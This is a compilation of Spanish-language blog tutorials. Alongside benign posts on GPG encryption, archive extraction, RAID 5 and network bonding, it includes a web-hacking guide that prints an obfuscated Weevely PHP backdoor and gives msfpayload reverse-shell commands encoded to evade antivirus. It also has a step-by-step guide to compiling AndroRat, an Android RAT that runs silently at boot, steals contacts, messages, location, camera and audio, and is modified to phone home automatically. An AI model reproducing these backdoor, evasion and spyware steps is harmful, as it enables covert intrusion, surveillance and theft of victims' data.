Lista de palabras: Creación de su propio WordList con Backtrack [Tutorial]

Muchos de mis amigos siempre me piden lista de palabras. Sí, es muy útil cuando se trata de la fuerza bruta. En realidad es muy útil cuando no se puede encontrar algún método para entrar en un sistema de seguridad. Aunque se tarda demasiado tiempo, pero su utilidad.

Tener una grande y una buena lista de palabras siempre ayuda pero como probador de la penetración debe ser capaz de crear sus propias listas de palabras personalizadas en función de la situación.

crunch

Aquí, en este tutorial voy a mostrar que la forma en que usted puede hacer su propia lista de palabras de acuerdo a su situación. Vamos a utilizar una herramienta en Backtrack nombrado como ‘Crunch’. Así que aquí vamos:

Paso 1: Abra el terminal y vaya a crujir directorio mediante el comando

cd /pentest/passwords/crunch

crunch1

Ahora vamos a hacer una lista de palabras que contiene toda la combinación que tiene ‘password’ estos personajes.

Así que vamos a ejecutar el siguiente comando:

./crunch 8 8 password –o wordlist.txt

crunch2

Ahora va a crear una lista de palabras que tienen una longitud mínima de caracteres 8, la longitud máxima de caracteres 8 con los personajes de ‘password’. Se puede ver en la imagen a continuación:

crunch3

Ahora usted también puede crear una lista de palabras que contendrá sólo los números para que usted puede utilizar este comando:

./crunch 4 4 1234 –o numwordlist.txt

Para alfanumérico puede utilizar este

./crunch 4 4 adm123 –o alphanum.txt

Espero les haya gustado este toturial porque ahora no dependen de nadie para una lista de palabras ..

Gracias .. :)

Tarea 3: Cifrar un fichero con Kleopatra – Gpg4win

12031986_180167425651878_6688136977114799334_n

  • Para descargar Gpg4win tenemos que ir a la dirección http://www.gpg4win.org/ y pulsar en el botón “Download Gpg4win” de color verde. Nos llevará a la página de descargas donde deberemos elegir la versión que queremos descargar.
  • Una vez instalado, tenemos que ejecutar la aplicación llamada “Kleopatra”, que se encontrará en el menú de aplicaciones, dentro del grupo llamado “Gpg4win”.
  • Una vez iniciada la aplicación vamos a ir a la  pestaña  de File / New certificate2015-09-28_12h19_09
  • luego daremos clic en la opción  «Create a personal  OpenPGP key pair» y luego  next2015-09-28_12h19_20
  • Ingresamos los datos básicos para crear dicho certificado: nombre y apellidos, dirección de correo electrónico y un comentario opcional.
    2015-09-28_12h19_39
  • Si pulsamos en el botón “Advanced Settings…”, podemos modificar algunos parámetros opcionales del certificado. Podemos elegir el tipo de clave a generar (RSA o DSA + ElGamal), la longitud de la clave (no se recomienda menos de 2048 bits actualmente), y el tipo de uso que haremos del certificado y la validez temporal del mismo
    2015-09-28_12h22_46
  • Una vez especificados los ajustes avanzados del certificado pulsamos en el botón “OK”, y cuando volvemos a la pantalla con los ajustes normales del certificado pulsamos sobre el botón “Next >”. Nos aparece la pantalla con el resumen de los ajustes:
    2015-09-28_12h19_48
  • Pulsamos sobre el botón “Create Key” para comenzar la generación de las claves del certificado en sí. Se nos pide que introduzcamos una contraseña para proteger la privacidad del certificado. Es importante introducir una contraseña robusta, puesto que cualquiera que descubra esta contraseña podrá utilizar nuestro certificado, y por tanto suplantar completamente nuestra identidad digital.
    2015-09-28_12h19_57
  • Una vez introducida la contraseña se generan las claves del certificado. Dependiendo de la velocidad de nuestro equipo y de la cantidad de actividad que tenga en ese momento le costará más o menos tiempo. Lo normal es que sean unos pocos segundos. Cuando termina se nos muestra una pantalla similar a la pantalla siguiente:
    2015-09-28_16h53_42
  • Una vez pulsado “OK” se nos devuelve a la pantalla anterior, y pulsando el botón “Finish” se termina el proceso de creación del certificado y volvemos a la pantalla inicial de la aplicación. Ahora se nos mostrará en la pestaña “My Certificates” el nuevo certificado recién creado:
    2015-09-27_21h11_22
  • Ya tenemos nuestro certificado, y esto nos permitirá cifrar ficheros para nosotros mismos (esto es, que sólo podamos descifrar nosotros). Pero será habitual que tengamos que cifrar ficheros para terceros. En este caso necesitaremos una copia de sus certificados. En concreto, de la parte pública de sus certificados (puesto que la privada nunca debe ser publicada).2015-09-29_06h06_28Se abre un cuadro de diálogo para escoger el fichero que contiene el certificado a importar, que deberá estar en uno de los formatos estándar para certificados OpenPGP o X.509. Una vez seleccionado el fichero, Kleopatra intentará importar el certificado. Si todo va bien, se nos muestra un cuadro de diálogo con un resumen de la operación.
    2015-09-29_06h08_13
  • Una vez tenemos importados los certificados de los usuarios para los que queremos cifrar un fichero, podemos llevar a cabo la operación de cifrado en sí. Para ello haremos uso de las extensiones del explorador de archivos que configura Kleopatra como parte de su instalación inicial.Vamos a la carpeta donde está el fichero que queremos cifrar. Pulsamos con el botón derecho sobre el fichero en cuestión y nos aparecerá un menú contextual similar al siguiente:2015-09-29_06h16_38
  • Escogemos “Firmar y cifrar” (la opción más interesante, ya que además de garantizar la confidencialidad con el cifrado, garantizamos la integridad del fichero con el firmado digital). En este caso se nos muestra una pantalla como la siguiente:2015-09-29_06h17_12
  • En este caso escogemos la opción (ya preseleccionada) “Sign and Encrypt (OpenPGP only)” y seleccionamos la casilla “Text output (ASCII armor)”, que guarda el fichero firmado y cifrado en un formato de texto ASCII (lo que hace que sea menos problemático para enviarlo por correo, por ejemplo).Pulsamos sobre el botón “Next >”.y en la siguiente pantalla se nos pide que indiquemos para qué usuario destinatario queremos cifrar el fichero. O dicho de otro modo, para que certificado queremos cifrar el fichero. Se nos muestra una lista de certificados disponibles. Si son muchos, podemos filtrarlos o bien usando la casilla “Find” (con un método de selección similar al indicado en la sección 3), o bien con el menú desplegable que está a la derecha de dicha casilla, donde podremos seleccionar diferentes subconjuntos de certificados.
  • Para escoger un certificado con el que cifrar el fichero, basta con seleccionarlo con el ratón y pulsar el botón “Add” de la zona intermedia. Nos quedaría como en la figura siguiente:
  • 2015-09-29_06h17_21
  • Una vez escogidos los certificados, pulsamos en el botón “Encrypt”. En este punto puede ocurrir que nos aparezca un cuadro de diálogo como el siguiente:2015-09-29_06h17_26
  • Si estamos seguros de que es lo que queremos, pulsamos el botón “Continue”. Sino pulsando el botón “Cancel” podemos volver a la pantalla anterior y añadir alguno de nuestros certificados a la lista de certificados destinatarios.
  • Si se introduce correctamente, se firma digitalmente el fichero con nuestro certificado y se cifra con el certificado o certificados destinarios y se nos muestra el resultado de la operación:
  • 2015-09-29_06h17_30
  • Ejemplo:
  • cifrado(1)

Tarea 1: Recoleccion de informacion mediante ping, whois, nmap

  • Hola a tod@s

Mostrare algunos ejemplos desde una máquina virtual de Kali 2.0

  • Ping herramienta que permite comprobar la disponibilidad de un host

Captura de pantalla de 2015-09-23 01:00:22

  • Whois herramienta que permite obtener información sobre un dominio

Captura de pantalla de 2015-09-23 21:16:17

  • Nmap esta herramienta que permite conocer puertos abiertos, sistemas operativos y aplicaciones que corren en un servidor o host

Captura de pantalla de 2015-09-24 00:17:09

[Penetration Testing – Hacking Etico] Análisis Web – Evaluación de Vulnerabilidades – Explotacion

INTRODUCCIÓN:
Hoy en día como muchos de nosotros tenemos conocimiento que en estos tiempos el Análisis de Aplicaciones Web juega un papel muy importante al hacer una Evaluación de la Seguridad y/o Penetration Testing, ya que esta nos brinda la información adecuada acerca de la aplicación web, como por ejemplo el tipo de Plugin que utiliza, tipos de CMS ya sea Joomla – WordPress u otros.
Esto nos ayudara mucho a determinar que Exploit debemos usar, o ver la manera exacta de explotar las vulnerabilidades que se pueden presentar al momento de realizar las pruebas de penetración.
Para ello usaremos como es de costumbre en este Blog, BackTrack 5 R3, una distro de Linux basada en Ubuntu hecha perfectamente para llevar a cabo estas pruebas, ya que viene con un conjunto de herramientas muy importantes que servirá de mucho para obtener toda la información necesaria.

MÉTODOS DE ANÁLISIS DE APLICACIONES WEB:
  • Network Mapping
  • CMS Identification
  • IDS/IPS Detection
  • Open Source Analysis
  • Web Crawlers
  • Vulnerability Assessment and Exploitation
  • Maintaining Access
NETWORK MAPPING:
Network Mapping es el estudio de la conectividad física de redes. Internet Mapping es el estudio de la conectividad física de la Internet. Network Mapping a menudo se trata de determinar los servidores y sistemas operativos se ejecutan en redes.
La ley y la ética de escaneo de puertos son complejas. Un análisis de la red puede ser detectada por los seres humanos o sistemas automatizados, y se trata como un acto malicioso.
En la suite de BackTrack se incluye NMAP, una herramienta que ya todos conocemos por su potencia y eficacia a la hora de utilizarla, la cual nos sirve de mucho para poder llevar a cabo este método tan importante en una Auditoria Web.
Nmap:
Nmap (“mapeador de redes”) es una herramienta de código abierto para exploración de red y auditoría de seguridad. Se diseñó para analizar rápidamente grandes redes, aunque funciona muy bien contra equipos individuales. Nmap utiliza paquetes IP «crudos» («raw», N. del T.) en formas originales para determinar qué equipos se encuentran disponibles en una red, qué servicios (nombre y versión de la aplicación) ofrecen, qué sistemas operativos (y sus versiones) ejecutan, qué tipo de filtros de paquetes o cortafuegos se están utilizando así como docenas de otras características.
Esta herramienta es muy usada por los Pentesters cuando realizan  Pruebas de Penetración.
Uso:
CMS IDENTIFICATION:
  • Blindelephant
  • CMS-explorer
  • Whatweb
BlindElephant:
BlindElephant es una herramienta basada en python que se utiliza para realizar Fingerprinting en Aplicaciones Web.
La herramienta es rápida, tiene poco ancho de banda y esta altamente automatizado.
Uso:
  • /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://site.com/ cms
CMS-Explorer:
Es otra herramienta basada en Perl que sirve para realizar Fingerprinting en Aplicaciones Web, como también puede ser usado para identificar el tipo de CMS utilizado, por tanto, se realiza el ataque de acuerdo con la información obtenida.
Uso:
  • /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://site.com/ -type cms
WhatWeb:
Es otra herramienta que se utiliza para identificar el tipo de sistemas de gestión contenidos (CMS), plataforma de blogs, estadísticas, bibliotecas javascript y servidores utilizados. Cuenta con 900 Plugins para fines de análisis web.
Uso:
IDS-IPS DETECTION:
Durante la realización de un VA/PT en un dominio, existe la posibilidad de que IDS-IPS esten instalados, esto aveces puede parar varios tipos de ataques realizados en el dominio.
Una gran cantidad de WAF se venden a las Empresas como una técnica valida para la mitigacion de vulnerabilidades en las Aplicaciones Web.
Por suerte, WAF es facil de detectar, porque la mayoría de estos utilizan la firma basada en métodos de detección, por lo tanto, el atacante puede tratar de codificar los parámetros de ataque y tratar de bypassear el WAF.
En la suite de BackTrack se incluyen dos herramientas útiles para la detección de los IDS-IPS, las cuales son:
  • Waffit
  • UA-Tester
Waffit:
Es una herramienta que detecta los posibles Firewall que pueda tener un servidor web, esto sirve de mucho ya que detectar el servidor de seguridad detrás del dominio es un paso muy importante en el proceso de Pruebas de Penetración.
Uso:
UA-Tester:
Esta herramienta esta diseñada para comprobar automáticamente si una URL especifica esta usando una lista Standar o No-Standar User-Agent proporcionada por el usuario (1 por linea).
Uso:
OPEN SOURCE ANALYSIS:
Open-Source Analysis se realiza utilizando herramientas como GHDB, revhosts, xssed y Maltego. El GHDB (Google Hack Data Base) y Xssed estan vinculadas a sitios webs, mientras que las dos otras son herramientas de consola.
GHDB:
Google Hacking Database, el equipo de exploit-db mantiene una base de datos para google dorks que pueden ayudar mucho a los Pen-testers en la recopilación de información. Podemos usar las dork’s para encontrar ciertos tipos de servidores vulnerables u otra información.
Por ejemplo, un dork Google como «Microsoft-IIS/6.0″ intitle:index.of » se puede utilizar para detectar el servidor que ejecuta Microsoft IIS 6.0.
Xssed:
Xssed.com es otro sitio web que contiene una lista de sitios web vulnerables a Cross Site Scripting, presentada por varios autores.
Se puede abrir desde: Applications – Backtrack – Information Gathering – Web Application Analysis – Open Source Analysis – Xssed.
Revhosts:
Revhosts es un proyecto pasivo escrito en Python que se utiliza para la recopilación de información (es decir, el Host, VirtualHost, entrada de DNS, directorios, dirección de correo, subred, etc.) Esta herramienta se encuentra tanto en la interfaz gráfica de usuario y la consola.

Se ubica en: Applications – BackTrack – Information Gathering – Web Application Analysis – Open Source Analysis – Revhosts.

WEB CRAWLERS:
En esta ultima categoría de Análisis Web, se utilizan los famosos Crawlers, esto ayudara mucho a enumerar los archivos «escondidos» dentro de un servidor web.
La suite de BackTrack cuenta con muchas herramientas para llevar a cabo este tipo de análisis  como son el Dirb, Golismero, SqlScan, Deblaze y WebShag.
WebShag tiene opciones como escaneo de puertos, recopilación de información básica, spider y fuzzing , se puede encontrar en: Applications – BackTrack – Information Gathering – Web Application Analysis – Web Crawlers – WebShag Gui.
 
 
 
 
VULNERABILITY ASSESSMENT AND EXPLOITATION:
 
La etapa de evaluación de la vulnerabilidad es donde se puede explorar nuestro objetivo en busca de errores, pero antes de hacer una evaluación de la vulnerabilidad, la recopilación de información sobre el objetivo es mucho más útil.
La fase de recopilación de información sigue siendo el paso clave antes de realizar nuevos ataques, simplemente porque hace el trabajo más fácil, por ejemplo, en la primera etapa: en el uso de escáners para identificar el CMScomo BlindElephant, se escaneo y se encontró la versión de la aplicación instalada.
Ahora, en la etapa de evaluación de la vulnerabilidad, se pueden utilizar muchas herramientas (escaners) que ayudaran mucho a encontrar respectivas vulnerabilidades en un servidor web especifico, como por ejemplo:
Joomscan:
Es una herramienta basada en Perl que se utiliza para identificar las vulnerabilidades mas conocidas como Sql Injection, XSS u otras, en los servidores web basados en la plataforma Joomla.
Uso:
SqlMap:
Sqlmap es una herramienta de código abierto que ayuda a automatizar el proceso de detectar y explotar las vulnerabilidades de inyección SQL permitiendo tener acceso total a la base de datos de los servidores web.
Uso:
Fimap:
Fimap es una pequeña herramienta programada en python que puede encontrar, preparar, auditar & explotar automáticamente los errores de Remote File Inclusion en aplicaciones web. Fimap debe ser algo como sqlmap pero sólo para LFI/RFI en lugar de la inyección de SQL. Esta actualmente bajo desarrollo, pero es utilizable. El objetivo de Fimap es mejorar la calidad y la seguridad de su sitio web.
Uso:
  • /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23
  • /pentest/web/fimap# ./fimap.py -g -q ‘noticias.php?id=’
TheHarvester:
TheHarvester es una herramienta para recopilar cuentas de correo electrónico, nombres de usuario y nombres de host o subdominios de diferentes fuentes públicas como motores de búsqueda y los servidores de claves PGP.
Uso:
  • ./theharvester.py -d microsoft.com -l 500 -b google
  • ./theharvester.py -d microsoft.com -b pgp
  • ./theharvester.py -d microsoft -l 200 -b linkedin
Shodan:
Esto es otra herramienta de evaluación web, una utilidad particular para los pentesters. Puede ser utilizado para recoger una serie de información inteligente sobre los dispositivos que están conectados a la Internet. Podemos, por ejemplo, buscar para ver si todos los dispositivos de red, como routers, VoIP, impresoras, cámaras, etc están en su lugar. Para buscar si algún servicio se está ejecutando en el dominio, la sintaxis sería:
  • hostname:target.com port:80,21,22
Si deseamos simplemente conocer los resultados sobre el nombre de host, simplemente, la sintaxis seria:
  • hostname:target.com
W3af:
W3af es una herramienta de Auditoria de Seguridad para Aplicaciones Webs, se encuentra básicamente dividido en varios módulos como el Ataque, Auditoria, Exploit, Descubrimiento, Evasion y Brute Force, lo cual se pueden usar todos en consecuencia.
Estos módulos en W3af viene con varios módulos secundarios como, por ejemplo, podemos seleccionar la opción XSS en el módulo de Auditoria  suponiendo que es necesario para realizar una determinada Auditoria.
Se ubica en: Applications – BackTrack – Vulnerability Assessment – Web Application Assessment – Web Vulnerability Scanners – w3af
Una vez completado el análisis, w3af muestra información detallada acerca de las vulnerabilidades encontradas en el sitio web especificado, que se puede comprometer en consecuencia de una explotación adicional.
Una vez que la vulnerabilidad es encontrada, podemos configurar los plugins en el modulo «Exploit» y realizar nuevos ataques, que nos pueden ayudar a obtener una WebShell en el sitio objetivo. Otra ventaja importante de w3af es que también viene con MSF para tomar el ataque al siguiente nivel.
Uniscan:
Uniscan es un escáner de vulnerabilidades Web, dirigido a la seguridad informática, cuyo objetivo es la búsqueda de vulnerabilidades en los sistemas web. Está licenciado bajo GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).
Uniscan está desarrollado en Perl, tiene un fácil manejo de expresiones regulares y también es multi-threaded.
Se puede descargar desde el siguiente link: Download Uniscan Web Vulnerability Scanner v6.2
Uso:
Nikto:
Nikto es un escáner de servidor web que realiza pruebas completas contra los servidores web para varios artículos, incluyendo más de 6500 archivos/CGIs potencialmente peligrosos, los controles de versiones no actualizadas de más de 1250 servidores, y los problemas específicos de la versión de más de 270 servidores. También comprueba los elementos de configuración del servidor, tales como la presencia de múltiples archivos de índice y opciones de servidor HTTP.
Se ubica en: Applications – BackTrack – Vulnerability Assessment – Web Application Assessment – Web Vulnerability Scanners – Nikto
 
Uso:
  • /pentest/web/nikto# ./nikto.pl -host ww.site.com
MAINTAINING ACCESS:
Una vez que tengamos acceso a la página web (objetivo), tenemos que mantener el acceso para su uso futuro, porque no queremos estar empezando desde cero una y otra vez. Con el fin de evitar esto, podemos cargar las shell’s web o puertas traseras a la página web.
La codificación de la puerta trasera también es importante, ya que no debe crear «ruido» una vez cargado en el servidor. Si es así, entonces los administradores pueden fácilmente detectar y eliminar las puertas traseras.
En la suite de BackTrack 5r3 se incorporan buenas herramientas para llevar a cabo este proceso, las cuales son los siguientes:
Weevely:
Weevely es una herramienta esencial para la explotación posterior de aplicaciones web, y se puede utilizar como puerta trasera o como una shell web para gestionar las cuentas web. Weevely busca funciones como system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) utilizando las funciones activadas en una servidor remoto. El código siguiente es un ejemplo del código de la puerta trasera creada por Weevely.
————————————————————————
eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’));
————————————————————————
Se ubica en: Applications – BackTrack – Maintaining Access – Web BackDoors – Weevely
Uso:
  • /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php (creara el backdoor)
MsfPayload:
Metasploit se puede utilizar para crear puertas traseras que luego pueden ser utilizados para mantener el acceso en el servidor web. Esto se puede hacer con la ayuda de msfpayload.
Los pasos para crear puerta trasera en msfpayload son como sigue:
Tenemos que seleccionar el Payload que vamos a utilizar para obtener un shell Meterpreter generado a través de una conexión TCP inverso. El comando sería:
  • msfpayload windows/meterpreter/reverse_tcp
Esta Payload tiene dos parámetros: LHOST (nuestra IP) y el LPORT para seleccionar el puerto que vamos a utilizar. La «R» se utiliza para dar al archivo de salida en formato de datos RAW para que podamos codificar posteriormente.
  • msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R
Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar la detección de los antivirus, para tal caso se puede hacer usando la opción msfencode, para hacer esto, necesitamos usar barra vertical («|»)
  • windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe 
-e se usa para especificar el tipo de codificación necesario, en este caso estoy usando la codificación shikata_ga_nai y -t para el tipo de extension del archivo (exe).
Por ejemplo, si deseamos ver la lista de los codificadores disponibles en MSF, usamos el siguiente comando:
  • msfpayload windows/meterpreter/reverse_tcp -l
CONCLUSIÓN:
Estos son sólo unos pocos métodos que se pueden seguir para realizar la explotación de las vulnerabilidades en una aplicación web. Una vez que tengamos la información acerca de nuestro objetivo, tratar de realizar una evaluación de la vulnerabilidad con el fin de obtener información sobre los exploits que se pueden utilizar. Una vez hecho esto, explotar las vulnerabilidades y si es necesario, cargar un backdoor, pero antes de eso, se debe codificar el backdoor con el fin de evitar la detección.
Espero que esto te ayude a encontrar la vulnerabilidad, la explotación y la forma de mantener el acceso a tu objetivo.
Saludos y hasta la próxima 😉

Android -Compilar AndroRat

 Android -Compilar AndroRat

Androrat es un RAT (Remote Administration Tool) de código abierto para Android. Se trata de una aplicación cliente-servidor desarrollada en Java (Java Android para el cliente y Java/Swing para el servidor) por un equipo de cuatro desarrolladores universitarios en tan sólo un mes (video). Por lo tanto es casi una prueba de concepto, si bien es bastante funcional ya que en sus primeras versiones puede:
  • Obtener los contactos (y toda la información de ellos)
  • Obtener los registros de llamadas
  • Obtener todos los mensajes
  • Localización por GPS / Red
  • Monitorizar mensajes recibidos en tiempo real
  • Monitorizar el estado del teléfono en tiempo real (llamada recibida, llamada enviada, llamada perdida)
  • Tomar una fotografía desde la cámara
  • Obtener el sonido del micrófono (u otras fuentes)
  • Obtener el streaming de vídeo (sólo para clientes basados en actividad)
  • Enviar un mensaje de texto
  • Relizar una llamada
  • Abrir una URL en el navegador por defecto
  • Hacer vibrar el teléfono

La aplicación Android se ejecuta como un servicio (no una actividad) que se inicia durante el arranque. Por lo tanto el usuario no tiene que interactuar con el servicio (si bien hay una actividad de depuración que permite configurar la dirección IP y el puerto de conexión). La conexión con el servidor puede ser desencadenada por un SMS o una llamada (configurable).

-Android Developer Tools descargar desde: http://developer.android.com/sdk/index.html
-Java Runtime instalado (descargar del sitio web de java)
fuente AndroRAT descargar desde: http://www7.zippyshare.com/v/39764529/file.html

-Algunos conocimientos básicos de java es recomendable pero no obligatorioPor dónde empezar
Descargue las herramientas de desarrollo, extraer
ejecutar /home/bugtraq/Desktop/adt-bundle-linux-x86/eclipse\ eclipseDebería tener este aspecto:

Imagen

En primer lugar vamos a preparar el SDK para compilar . El SDK se incluye con las herramientas básicas y las bibliotecas, pero tenemos que descargar más packs para compilar AndroRAT. En Eclipse, haga clic en:-Window
-Android Manager SDK Esto debería abrir:

Imagen

Revisé la aplicación para Android y necesita nivel API 2,2 eso no significa que Es sólo para 2,2! Es el requisito mínimo, se ejecutará en GingerBread 2.2 o superior! (2,3, HC, ICS, JB) Seleccione los siguientes

Imagen

y haga clic en paquetes de instalación, acepte cualquier cosa que aparece, y esperar a que finalice la descarga. Reiniciar Eclipse— Compilar el APK —Ahora ve a
-File-
-New-
-Proyect
Seleccione la siguiente

Imagen

En la nueva ventana, haga clic en Examinar y seleccione la siguiente

Imagen

haga clic en OK,

Imagen

aviso de que ya he comprobado el proyecto en la captura de pantalla, hacer lo mismo cuando se llega a este punto. Ahora haga clic en Finalizar y se carga el proyecto en eclipse. (El nombre del proyecto es LauncherActivity) Ahora, usted puede compilar esta aplicación sin problemas, pero se le pedirá el inicio (cuando se instala en el teléfono y en marcha) para la dirección IP de su servidor (su NO-IP del host desde que se oculta tras que supongo). BUUUUT que wouldnt ser mucho de una rata super secreto ahora, ¿verdad? Vamos a cambiar esta fuente más adelante para hacer que automaticamente se configura en el arranque e ir a fondo Puede hacer clic en este botón que aparece en la imagen para compilar el apk

Imagen
(como cuando se le preguntó lo que sería compilar, seleccione Aplicación para Android)Nota: el apk se encuentra en la carpeta bin dentro de la carpeta del proyecto!— Compilación del servidor —Ok ahora permite compilar el servidor haga clic en: -File -import Ahora selecciona esta ya que es una aplicación para PC
Imagen

Una vez más, haga clic en Examinar, cuando el nuevo ventana aparece, y seleccione la siguiente:

Imagen

la carpeta seleccionada es AndroRat servidor en la carpeta src se encuentra dentro del archivo fuente descargado desde github Eso es la aplicación java . Ya que compilar y está disponible en HF, pero tendrá que hacerlo usted mismo más tarde como nuevas versiones salen Una vez más, tenemos esta pantalla, sólo debe marcar el proyecto y haga clic en Finalizar

Imagen

pero qué es eso: o mierda ! Imagen:Dmuestra un error en el proyecto! Bueno, vamos a echar un vistazo … Haga clic derecho sobre la carpeta del proyecto (en eclipse, el icono con el signo “!”) y en la nueva ventana selecciona esta en el lado izquierdo

Imagen

cambie a la pestaña de la captura de pantalla (Libreries) Ahora vemos el culpable que causó los errores! Las Libreries con la “x” enviaban marca encontrada por eclipse, así que vamos a eliminarlos. Seleccione todos ellos y haga clic en “Remove” (a la derecha de la ventana) Ok, pero esto no se ha solucionado mucho ya que el proyecto todavía necesita esas bibliotecas. Ahora vamos a cargar. En la misma ventana, haga clic en el siguiente:

Imagen

Navegue hasta aquí: (androrat-master \ src \ api)
Imagen

Puede ver todas las Librerias que faltan ahora. Seleccione todos ellos y haga clic en Abrir.
Ellos se sumarán al proyecto y estamos a punto de terminar ahora. Haga clic en Aceptar y ver la desaparición de los putos errores.
Imagen

Ahora el paso final , compilarlo. Haga clic en: Archivo Exportar y seleccione
Imagen

Establezca las opciones en la siguiente pantalla para que parezca aquí:
Imagen

haga clic en Examinar y elegir dónde se guardará Haga clic en Finalizar y verlo compilación, obtendrá 2 advertencias, haga clic en Aceptar en cada uno y se puede ejecutar :

  Código:
java -jar archvo.jar

y deveria aparecer esto xD

Imagen

Es broma

Imagen—– Modificar el apk para configurar automáticamente a nuestro servidor —-Esto es realmente corto y fácil, pero yo creía en un principio se necesitará tiempo un poco más, así que ni siquiera lo intentó hasta que termine todo mi trabajo jeje. Lo que tienes que hacer es:abrir de nuevo el archivo de clase (LauncherActivity)

:Imagen

borrar todo su contenido y sustituirlo por el siguientehttps://dl.dropbox.com/u/67764496/AndroRat/source.txteditar las partes :Imagen
lugar del anfitrión NOIP ofc puede poner su ip allí, pero yo no recomiendo hacer eso .. -compile y que son buenos para ir xD
No he probado todavía, pero debería funcionar, por favor deje un comentario para que pueda confirmarlo ;)EOF Cambios Versión:Versión 1.0f
-Release Version 1.1f -Añadida la configuración de la parte SDK que yo estúpidamente saltado antes. Versión 1.2f -Añadida la aplicación para configurar automáticamente la modificación en síbueno confirmo q funciona en la maquina virtualImagen

de danielplomo Publicado en Android

Descomprimir archivos en Linux desde la consola

En modo gráfico tenemos el gestor de archivadores para facilitarnos la vida. Pero, ¿cómo tratar con archivos comprimidos o empaquetados como los tgz, tar, bz2 o rar en la consola?

tar

Se trata de un archivo que combina varios archivos en uno, no hay compresión de datos. Para extraer el contenido usamos el comando tar con los flags x (extract, extraer) y f (file, desde un archivo), y opcionalmente v (verbose) para mostrar por pantalla el proceso o vv para mostrar no solo los archivos y carpetas creadas, sino información sobre estas.

tar xvf archivo.tar

 

gz

Se trata de un archivo comprimido con gzip. Para descomprimir utilizamos el comando gzip con el flag -d (descomprimir) o bien el comando gunzip, que no es más que un enlace a gzip.

gunzip archivo.gz
gzip -d archivo.gz

tgz, tar.gz

Un archivo empaquetado con tar y comprimido con gunzip. Se descomprime de la misma forma que los tar, añadiendo el flag z para indicarle que use gzip para descomprimir.

tar xvzf archivo.tar.gz

bz2

Archivo comprimido con bzip2. Para descomprimir se usa el comando bzip2 con el flag -d (descomprimir) o bien el comando bunzip2, que no es más que un enlace a bzip2.

bunzip2 archivo.bz2
bzip2 -d archivo.bz2

tar.bz2

Similar a los archivos tar.gz, pero se usó bzip2 para comprimirlo. Para descomprimir se usa también tar, con el flag j en lugar de z:

tar xvjf archivo.tar.bz2

zip

Archivo comprimido con zip. Se descomprime usando el comando unzip:

unzip archivo.zip

rar

Formato propietario de RarLab, creadores del famoso Winrar. Normalmente el comando rar no está instalado en el sistema

sudo aptitude install rar

Se descomprime con el flag -x (eXtract, extraer)

rar -x archivo.rar

de danielplomo Publicado en Linux

Implementación RAID 5 por software en centos 6.2

Bueno en esta entrada les enseñare a implementar RAID por software

bueno primero que todo Debemos tener como mínimo 3 discos, una vez creados los discos continuamos con el proceso.

Procedemos a crear el arreglo RAID 5

/dev/md0 nombre del dispositivo de bloques, level Indicamos el nivel de RAID, raid-device Indicamos el número de dispositivos en el RAID.

A continuación mediante el comando /proc/mdstat podremos ver el proceso de inicialización del RAID.


El siguiente paso será darles formato a las particiones RAID.


Creamos los puntos de montaje en donde serán alojadas nuestras particiones RAID. Para ello crearemos dos carpetas dentro de la ruta /mnt.

Y luego de crearlas monte sobre ellas las particiones RAID creadas anteriormente

Entramos en modo de recuperación

Sincronizamos el /var

Luego ejecutamos init 5 para regresar al modo gráfico

Necesitamos el UUID para copiarlo en el archivo /etc/fstab, para ello digitamos

Copiamos el UUID  que esta en la linea del md0 en mi caso seria: b616a2a0-8147-42fc-9987-182c9272ad70

Para que nos monte las particiones RAID como RAIZ, debemos editar el archivo /etc/fstab agregar la siguiente línea al final

Montamos el sistema de archivos mencionados en el fstab

Deshabilitamos SELINUX editando el archivo /etc/selinux/config

Cambiamos el SELINUX=enforcing a SELINUX=disabled como muestra la imagen

Siguiendo la ruta Aplicaciones > Herramientas del sistema > Utilidad de discos podemos ver que el
punto de montaje de nuestro raid es /mnt/var

Pero necesitamos que quede montado solo en el /var para ello editamos de nuevo el archivo /etc/fstab

Reiniciamos con init 6 para aplicar cambios

Volvemos a la ruta y podemos ver que nuestro arreglo RAID5 ha quedado montado sobre /var.

de danielplomo Publicado en Linux

Configuracion de bonding en modo 1 (active-backup)

  1. Loggin como root

  2. Crear o editar el archivo /etc/modprobe.d/bondig.conf

 

  1. Agregar las siguientes líneas:

alias bond0 bonding

options bond0 primary=eth0 miimon=100 mode=1

Guardar cambios

Es importante utilizar el comando depmod para regenerar el archivo modules.dep y los archivos mapa de los controladores.

  1. Desplazarse hasta la carpeta

    /etc/sysconfig/network-scripts/

 

 

  1. Renombrar y comentar los archivos:

Ifcfg-eth0

Ifcfg-eth1

  1. Crear los archivos ifcfg-eth0 con las siguientes líneas:

 

DEVICE=eth0  # ya sea la que estés configurando en ese momento

ONBOOT=yes

BOOTPROTO=none

TYPE=Ethernet

USERCTL=yes

SLAVE=yes

MASTER=bond0

 

      7. Crear los archivos ifcfg-eth1 con las siguientes líneas:

DEVICE=eth1  # ya sea la que estés configurando en ese momento

ONBOOT=yes

BOOTPROTO=none

TYPE=Ethernet

USERCTL=no

SLAVE=yes

MASTER=bond0

      8. Crear el archive ifcfg-bon0 con las siguientes lineas:

 

Los parámetros de direcciones IP depende de la red.

DEVICE=bond0

ONBOOT=yes

BOOTPROTO=dhcp

#IPADDR=192.168.0.250

#NETMASK=255.255.255.0

#GATEWAY=192.168.0.1

TYPE=unknown

USERCTL=no

         9.    Para verificar que la interfaz lógica quedó configurada, en el caso de haber utilizado las interfaces eth0 y eth1, utilice:
Ifconfig

     

